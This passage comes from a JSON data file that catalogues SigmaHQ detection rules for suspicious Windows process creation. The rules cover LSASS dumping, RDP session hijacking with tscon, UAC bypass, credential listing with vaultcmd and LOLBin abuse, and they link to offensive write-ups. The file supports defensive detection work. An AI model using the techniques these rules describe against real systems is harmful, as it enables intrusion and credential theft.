"2017/08/15", - "filename": "proc_creation_win_susp_svchost.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "It is extremely abnormal for svchost.exe to spawn without any CLI arguments and is normally observed when a malicious process spawns the process and injects code into the process memory space.", - "uuid": "16c37b52-b141-42a5-a3ea-bbe098444397", - "value": "Suspect Svchost Activity", - "meta": { - "refs": [ - "https://securitybytes.io/blue-team-fundamentals-part-two-windows-processes-759fe15965e2", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_svchost_no_cli.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055" - ], - "creation_date": "2019/12/28", - "filename": "proc_creation_win_susp_svchost_no_cli.yml", - "author": "David Burkett", - "level": "high", - "falsepositive": [ - "Rpcnet.exe / rpcnetp.exe which is a lojack style software. https://www.blackhat.com/docs/us-14/materials/us-14-Kamlyuk-Kamluk-Computrace-Backdoor-Revisited.pdf" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious sysprep process start with AppData folder as target (as used by Trojan Syndicasec in Thrip report by Symantec)", - "uuid": "d5b9ae7a-e6fc-405e-80ff-2ff9dcc64e7e", - "value": "Sysprep on AppData Folder", - "meta": { - "refs": [ - "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets", - "https://app.any.run/tasks/61a296bb-81ad-4fee-955f-3b399f4aaf4b", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_sysprep_appdata.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059" - ], - "creation_date": "2018/06/22", - "filename": "proc_creation_win_susp_sysprep_appdata.yml", - "author": "Florian Roth", - "level": "medium", - "falsepositive": [ - "False positives depend on scripts and administrative tools used in the monitored environment" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects usage of the \"systeminfo\" command to retrieve information", - "uuid": "0ef56343-059e-4cb6-adc1-4c3c967c5e46", - "value": "Suspicious Execution of Systeminfo", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1082/T1082.md#atomic-test-1---system-information-discovery", - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/systeminfo", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_systeminfo.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1082" - ], - "creation_date": "2022/01/01", - "filename": "proc_creation_win_susp_systeminfo.yml", - "author": "frack113", - "level": "low", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a suspicious process creation as SYSTEM user (suspicious program or command line parameter)", - "uuid": "2617e7ed-adb7-40ba-b0f3-8f9945fe6c09", - "value": "Suspicious SYSTEM User Process Creation", - "meta": { - "refs": [ - "Internal Research", - "https://tools.thehacker.recipes/mimikatz/modules", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_system_user_anomaly.yml" - ], - "tags": "No established tags", - "creation_date": "2021/12/20", - "filename": "proc_creation_win_susp_system_user_anomaly.yml", - "author": "Florian Roth (rule), David ANDRE (additional keywords)", - "level": "high", - "falsepositive": [ - "Administrative activity", - "Scripts and administrative tools used in the monitored environment", - "Monitoring activity" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects Access to Domain Group Policies stored in SYSVOL", - "uuid": "05f3c945-dcc8-4393-9f3d-af65077a8f86", - "value": "Suspicious SYSVOL Domain Group Policy Access", - "meta": { - "refs": [ - "https://adsecurity.org/?p=2288", - "https://www.hybrid-analysis.com/sample/f2943f5e45befa52fb12748ca7171d30096e1d4fc3c365561497c618341299d5?environmentId=100", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_sysvol_access.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1552.006" - ], - "creation_date": "2018/04/09", - "filename": "proc_creation_win_susp_sysvol_access.yml", - "author": "Markus Neis, Jonhnathan Ribeiro, oscd.community", - "level": "medium", - "falsepositive": [ - "Administrative activity" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries can interact with the DACLs using built-in Windows commands takeown which can grant adversaries higher permissions on specific files and folders", - "uuid": "554601fb-9b71-4bcc-abf4-21a611be4fde", - "value": "Suspicious Recursive Takeown", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/takeown", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1222.001/T1222.001.md#atomic-test-1---take-ownership-using-takeown-utility", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_takeown.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1222.001" - ], - "creation_date": "2022/01/30", - "filename": "proc_creation_win_susp_takeown.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Scripts created by developers and admins", - "Administrative activity" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects shell32.dll executing a DLL in a suspicious directory", - "uuid": "32b96012-7892-429e-b26c-ac2bf46066ff", - "value": "Shell32 DLL Execution in Suspicious Directory", - "meta": { - "refs": [ - "https://www.group-ib.com/resources/threat-research/red-curl-2.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_target_location_shell32.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.t1218.011" - ], - "creation_date": "2021/11/24", - "filename": "proc_creation_win_susp_target_location_shell32.yml", - "author": "Christian Burkard", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may stop services or processes in order to conduct Data Destruction or Data Encrypted for Impact on the data stores of services like Exchange and SQL Server.", - "uuid": "86085955-ea48-42a2-9dd3-85d4c36b167d", - "value": "Suspicious Execution of Taskkill", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1489/T1489.md#atomic-test-3---windows---stop-service-by-killing-process", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_taskkill.yml" - ], - "tags": [ - "attack.impact", - "attack.t1489" - ], - "creation_date": "2021/12/26", - "filename": "proc_creation_win_susp_taskkill.yml", - "author": "frack113", - "level": "low", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network", - "uuid": "63332011-f057-496c-ad8d-d2b6afb27f96", - "value": "Suspicious Tasklist Discovery Command", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1057/T1057.md#atomic-test-2---process-discovery---tasklist", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_tasklist_command.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1057" - ], - "creation_date": "2021/12/11", - "filename": "proc_creation_win_susp_tasklist_command.yml", - "author": "frack113", - "level": "low", - "falsepositive": [ - "Administrator, hotline ask to user" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the creation of taskmgr.exe process in context of LOCAL_SYSTEM", - "uuid": "9fff585c-c33e-4a86-b3cd-39312079a65f", - "value": "Taskmgr as LOCAL_SYSTEM", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_taskmgr_localsystem.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1036" - ], - "creation_date": "2018/03/18", - "filename": "proc_creation_win_susp_taskmgr_localsystem.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the creation of a process from Windows task manager", - "uuid": "3d7679bd-0c00-440c-97b0-3f204273e6c7", - "value": "Taskmgr as Parent", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_taskmgr_parent.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1036" - ], - "creation_date": "2018/03/13", - "filename": "proc_creation_win_susp_taskmgr_parent.yml", - "author": "Florian Roth", - "level": "low", - "falsepositive": [ - "Administrative activity" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "This rule detects DLL injection and execution via LOLBAS - Tracker.exe", - "uuid": "148431ce-4b70-403d-8525-fcc2993f29ea", - "value": "DLL Injection with Tracker.exe", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Tracker/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_tracker_execution.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1055.001" - ], - "creation_date": "2020/10/18", - "filename": "proc_creation_win_susp_tracker_execution.yml", - "author": "Avneet Singh @v3t0_, oscd.community", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a possible process memory dump that uses the white-listed Citrix TrolleyExpress.exe filename as a way to dump the lsass process memory", - "uuid": "4c0aaedc-154c-4427-ada0-d80ef9c9deb6", - "value": "Process Access via TrolleyExpress Exclusion", - "meta": { - "refs": [ - "https://twitter.com/_xpn_/status/1491557187168178176", - "https://www.youtube.com/watch?v=Ie831jF0bb0", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_trolleyexpress_procdump.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218.011", - "attack.credential_access", - "attack.t1003.001" - ], - "creation_date": "2022/02/10", - "filename": "proc_creation_win_susp_trolleyexpress_procdump.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a tscon.exe start as LOCAL SYSTEM", - "uuid": "9847f263-4a81-424f-970c-875dab15b79b", - "value": "Suspicious TSCON Start as SYSTEM", - "meta": { - "refs": [ - "http://www.korznikov.com/2017/03/0-day-or-feature-privilege-escalation.html", - "https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6", - "https://www.ired.team/offensive-security/lateral-movement/t1076-rdp-hijacking-for-lateral-movement", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_tscon_localsystem.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1219" - ], - "creation_date": "2018/03/17", - "filename": "proc_creation_win_susp_tscon_localsystem.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a suspicious RDP session redirect using tscon.exe", - "uuid": "f72aa3e8-49f9-4c7d-bd74-f8ab84ff9bbb", - "value": "Suspicious RDP Redirect Using TSCON", - "meta": { - "refs": [ - "http://www.korznikov.com/2017/03/0-day-or-feature-privilege-escalation.html", - "https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_tscon_rdp_redirect.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1563.002", - "attack.t1021.001", - "car.2013-07-002" - ], - "creation_date": "2018/03/17", - "filename": "proc_creation_win_susp_tscon_rdp_redirect.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects indicators of a UAC bypass method by mocking directories", - "uuid": "4ac47ed3-44c2-4b1f-9d51-bf46e8914126", - "value": "TrustedPath UAC Bypass Pattern", - "meta": { - "refs": [ - "https://medium.com/tenable-techblog/uac-bypass-by-mocking-trusted-directories-24a96675f6e", - "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", - "https://github.com/netero1010/TrustedPath-UACBypass-BOF", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_uac_bypass_trustedpath.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1548.002" - ], - "creation_date": "2021/08/27", - "filename": "proc_creation_win_susp_uac_bypass_trustedpath.yml", - "author": "Florian Roth", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a suspicious child process of userinit", - "uuid": "b655a06a-31c0-477a-95c2-3726b83d649d", - "value": "Suspicious Userinit Child Process", - "meta": { - "refs": [ - "https://twitter.com/SBousseaden/status/1139811587760562176", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_userinit_child.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1055" - ], - "creation_date": "2019/06/17", - "filename": "proc_creation_win_susp_userinit_child.yml", - "author": "Florian Roth (rule), Samir Bousseaden (idea)", - "level": "medium", - "falsepositive": [ - "Administrative scripts" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the execution of CSharp interactive console by PowerShell", - "uuid": "a9e416a8-e613-4f8b-88b8-a7d1d1af2f61", - "value": "Suspicious Use of CSharp Interactive Console", - "meta": { - "refs": [ - "https://redcanary.com/blog/detecting-attacks-leveraging-the-net-framework/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_use_of_csharp_console.yml" - ], - "tags": [ - "attack.execution", - "attack.t1127" - ], - "creation_date": "2020/03/08", - "filename": "proc_creation_win_susp_use_of_csharp_console.yml", - "author": "Michael R. (@nahamike01)", - "level": "high", - "falsepositive": [ - "Possible depending on environment. Pair with other factors such as net connections, command-line args, etc." - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "This rule detects execution of a PowerShell code through the sqlps.exe utility, which is included in the standard set of utilities supplied with the MSSQL Server.\nScript blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of these logs.\n", - "uuid": "0152550d-3a26-4efd-9f0e-54a0b28ae2f3", - "value": "Detection of PowerShell Execution via Sqlps.exe", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/sql/tools/sqlps-utility?view=sql-server-ver15", - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Sqlps/", - "https://twitter.com/bryon_/status/975835709587075072", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_use_of_sqlps_bin.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.defense_evasion", - "attack.t1127" - ], - "creation_date": "2020/10/10", - "filename": "proc_creation_win_susp_use_of_sqlps_bin.yml", - "author": "Agro (@agro_sev) oscd.community", - "level": "medium", - "falsepositive": [ - "Direct PS command execution through SQLPS.exe is uncommon, childprocess sqlps.exe spawned by sqlagent.exe is a legitimate action." - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "This rule detects execution of a PowerShell code through the sqltoolsps.exe utility, which is included in the standard set of utilities supplied with the Microsoft SQL Server Management studio.\nScript blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of these logs.\n", - "uuid": "a746c9b8-a2fb-4ee5-a428-92bee9e99060", - "value": "SQL Client Tools PowerShell Session Detection", - "meta": { - "refs": [ - "https://github.com/LOLBAS-Project/LOLBAS/blob/8283d8d91552213ded165fd36deb6cb9534cb443/yml/OtherMSBinaries/Sqltoolsps.yml", - "https://twitter.com/pabraeken/status/993298228840992768", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_use_of_sqltoolsps_bin.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.defense_evasion", - "attack.t1127" - ], - "creation_date": "2020/10/13", - "filename": "proc_creation_win_susp_use_of_sqltoolsps_bin.yml", - "author": "Agro (@agro_sev) oscd.communitly", - "level": "medium", - "falsepositive": [ - "Direct PS command execution through SQLToolsPS.exe is uncommon, childprocess sqltoolsps.exe spawned by smss.exe is a legitimate action." - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Windows Test Authoring and Execution Framework (TAEF) framework allows you to run automation by executing tests files written on different languages (C, C#, Microsoft COM Scripting interfaces\nAdversaries may execute malicious code (such as WSC file with VBScript, dll and so on) directly by running te.exe\n", - "uuid": "634b00d5-ccc3-4a06-ae3b-0ec8444dd51b", - "value": "Malicious Windows Script Components File Execution by TAEF Detection", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Te/", - "https://twitter.com/pabraeken/status/993298228840992768", - "https://docs.microsoft.com/en-us/windows-hardware/drivers/taef/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_use_of_te_bin.yml" - ], - "tags": [ - "attack.t1218" - ], - "creation_date": "2020/10/13", - "filename": "proc_creation_win_susp_use_of_te_bin.yml", - "author": "Agro (@agro_sev) oscd.community", - "level": "low", - "falsepositive": [ - "It's not an uncommon to use te.exe directly to execute legal TAEF tests" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "There is an option for a MS VS Just-In-Time Debugger \"vsjitdebugger.exe\" to launch specified executable and attach a debugger.\nThis option may be used adversaries to execute malicious code by signed verified binary.\nThe debugger is installed alongside with Microsoft Visual Studio package.\n", - "uuid": "15c7904e-6ad1-4a45-9b46-5fb25df37fd2", - "value": "Malicious PE Execution by Microsoft Visual Studio Debugger", - "meta": { - "refs": [ - "https://twitter.com/pabraeken/status/990758590020452353", - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Vsjitdebugger/", - "https://docs.microsoft.com/en-us/visualstudio/debugger/debug-using-the-just-in-time-debugger?view=vs-2019", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_use_of_vsjitdebugger_bin.yml" - ], - "tags": [ - "attack.t1218", - "attack.defense_evasion" - ], - "creation_date": "2020/10/14", - "filename": "proc_creation_win_susp_use_of_vsjitdebugger_bin.yml", - "author": "Agro (@agro_sev), Ensar \u015eamil (@sblmsrsn), oscd.community", - "level": "medium", - "falsepositive": [ - "The process spawned by vsjitdebugger.exe is uncommon." - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "List credentials currently stored in Windows Credential Manager via the native Windows utility vaultcmd.exe", - "uuid": "58f50261-c53b-4c88-bd12-1d71f12eda4c", - "value": "Windows Credential Manager Access via VaultCmd", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555.004/T1555.004.md#atomic-test-1---access-saved-credentials-via-vaultcmd", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_vaultcmd.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1555.004" - ], - "creation_date": "2022/04/08", - "filename": "proc_creation_win_susp_vaultcmd.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detect VBoxDrvInst.exe run with parameters allowing processing INF file.\nThis allows to create values in the registry and install drivers.\nFor example one could use this technique to obtain persistence via modifying one of Run or RunOnce registry keys\n", - "uuid": "b7b19cb6-9b32-4fc4-a108-73f19acfe262", - "value": "Suspicious VBoxDrvInst.exe Parameters", - "meta": { - "refs": [ - "https://github.com/LOLBAS-Project/LOLBAS/blob/4db780e0f0b2e2bb8cb1fa13e09196da9b9f1834/yml/LOLUtilz/OtherBinaries/VBoxDrvInst.yml", - "https://twitter.com/pabraeken/status/993497996179492864", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_vboxdrvinst.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1112" - ], - "creation_date": "2020/10/06", - "filename": "proc_creation_win_susp_vboxdrvinst.yml", - "author": "Konstantin Grishchenko, oscd.community", - "level": "medium", - "falsepositive": [ - "Legitimate use of VBoxDrvInst.exe utility by VirtualBox Guest Additions installation process" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious inline VBScript keywords as used by UNC2452", - "uuid": "20c3f09d-c53d-4e85-8b74-6aa50e2f1b61", - "value": "Suspicious VBScript UN2452 Pattern", - "meta": { - "refs": [ - "https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_vbscript_unc2452.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1547.001" - ], - "creation_date": "2021/03/05", - "filename": "proc_creation_win_susp_vbscript_unc2452.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects commands that temporarily turn off Volume Snapshots", - "uuid": "dee4af55-1f22-4e1d-a9d2-4bdc7ecb472a", - "value": "Disabled Volume Snapshots", - "meta": { - "refs": [ - "https://twitter.com/0gtweet/status/1354766164166115331", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_volsnap_disable.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ], - "creation_date": "2021/01/28", - "filename": "proc_creation_win_susp_volsnap_disable.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Legitimate administration" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects Microsoft Visual Studio vsls-agent.exe lolbin execution with a suspicious library load using the --agentExtensionPath parameter", - "uuid": "43103702-5886-11ed-9b6a-0242ac120002", - "value": "Suspicious Vsls-Agent Command With AgentExtensionPath Load", - "meta": { - "refs": [ - "https://twitter.com/bohops/status/1583916360404729857", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_vslsagent_agentextensionpath_load.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218" - ], - "creation_date": "2022/10/30", - "filename": "proc_creation_win_susp_vslsagent_agentextensionpath_load.yml", - "author": "bohops", - "level": "medium", - "falsepositive": [ - "False positives depend on custom use of vsls-agent.exe" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "A General detection for svchost.exe spawning rundll32.exe with command arguments like C:\\windows\\system32\\davclnt.dll,DavSetCookie.\nThis could be an indicator of exfiltration or use of WebDav to launch code (hosted on WebDav Server).\n", - "uuid": "2dbd9d3d-9e27-42a8-b8df-f13825c6c3d5", - "value": "Suspicious WebDav Client Execution", - "meta": { - "refs": [ - "https://github.com/OTRF/detection-hackathon-apt29/issues/17", - "https://threathunterplaybook.com/evals/apt29/detections/7.B.4_C10730EA-6345-4934-AA0F-B0EFCA0C4BA6.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_webdav_client_execution.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.t1048.003" - ], - "creation_date": "2020/05/02", - "filename": "proc_creation_win_susp_webdav_client_execution.yml", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious child processes of SysAidServer (as seen in MERCURY threat actor intrusions)", - "uuid": "60bfeac3-0d35-4302-8efb-1dd16f715bc6", - "value": "Suspicious SysAidServer Child", - "meta": { - "refs": [ - "https://www.microsoft.com/security/blog/2022/08/25/mercury-leveraging-log4j-2-vulnerabilities-in-unpatched-systems-to-target-israeli-organizations/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_web_sysaidserver.yml" - ], - "tags": "No established tags", - "creation_date": "2022/08/26", - "filename": "proc_creation_win_susp_web_sysaidserver.yml", - "author": "Florian Roth", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious Windows Error Reporting manager (wermgr.exe) process patterns - suspicious parents / children, execution folders, command lines etc.", - "uuid": "396f6630-f3ac-44e3-bfc8-1b161bc00c4e", - "value": "Suspicious WERMGR Process Patterns", - "meta": { - "refs": [ - "https://www.trendmicro.com/en_us/research/22/j/black-basta-infiltrates-networks-via-qakbot-brute-ratel-and-coba.html", - "https://www.echotrail.io/insights/search/wermgr.exe", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_wermgr.yml" - ], - "tags": "No established tags", - "creation_date": "2022/10/14", - "filename": "proc_creation_win_susp_wermgr.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may enumerate browser bookmarks to learn more about compromised hosts.\nBrowser bookmarks may reveal personal information about users (ex: banking sites, interests, social media, etc.) as well as details about\ninternal network resources such as servers, tools/dashboards, or other related infrastructure.\n", - "uuid": "725a9768-0f5e-4cb3-aec2-bc5719c6831a", - "value": "Suspicious Where Execution", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1217/T1217.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_where_execution.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1217" - ], - "creation_date": "2021/12/13", - "filename": "proc_creation_win_susp_where_execution.yml", - "author": "frack113, Nasreddine Bencherchali", - "level": "low", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the execution of whoami, which is often used by attackers after exploitation / privilege escalation but rarely used by administrators", - "uuid": "e28a5a99-da44-436d-b7a0-2afc20a5f413", - "value": "Whoami Execution", - "meta": { - "refs": [ - "https://brica.de/alerts/alert/public/1247926/agent-tesla-keylogger-delivered-inside-a-power-iso-daa-archive/", - "https://app.any.run/tasks/7eaba74e-c1ea-400f-9c17-5e30eee89906/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_whoami.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1033", - "car.2016-03-001" - ], - "creation_date": "2018/08/13", - "filename": "proc_creation_win_susp_whoami.yml", - "author": "Florian Roth", - "level": "medium", - "falsepositive": [ - "Admin activity", - "Scripts and administrative tools used in the monitored environment", - "Monitoring activity" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the execution of whoami with suspicious parents or parameters", - "uuid": "8de1cbe8-d6f5-496d-8237-5f44a721c7a0", - "value": "Whoami Execution Anomaly", - "meta": { - "refs": [ - "https://brica.de/alerts/alert/public/1247926/agent-tesla-keylogger-delivered-inside-a-power-iso-daa-archive/", - "https://app.any.run/tasks/7eaba74e-c1ea-400f-9c17-5e30eee89906/", - "https://www.youtube.com/watch?v=DsJ9ByX84o4&t=6s", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_whoami_anomaly.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1033", - "car.2016-03-001" - ], - "creation_date": "2021/08/12", - "filename": "proc_creation_win_susp_whoami_anomaly.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Admin activity", - "Scripts and administrative tools used in the monitored environment", - "Monitoring activity" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a suspicious process command line that uses whoami as first parameter (as e.g. used by EfsPotato)", - "uuid": "e9142d84-fbe0-401d-ac50-3e519fb00c89", - "value": "WhoAmI as Parameter", - "meta": { - "refs": [ - "https://twitter.com/blackarrowsec/status/1463805700602224645?s=12", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_whoami_as_param.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1033", - "car.2016-03-001" - ], - "creation_date": "2021/11/29", - "filename": "proc_creation_win_susp_whoami_as_param.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a suspicious winrar execution that involves a file with a .dmp extension, which could be a step in a process of dump file exfiltration", - "uuid": "1ac14d38-3dfc-4635-92c7-e3fd1c5f5bfc", - "value": "Winrar Compressing Dump Files", - "meta": { - "refs": [ - "https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_winrar_dmp.yml" - ], - "tags": [ - "attack.collection", - "attack.t1560.001" - ], - "creation_date": "2022/01/04", - "filename": "proc_creation_win_susp_winrar_dmp.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Legitimate use of WinRAR with a command line in which .dmp appears accidentally" - ], - 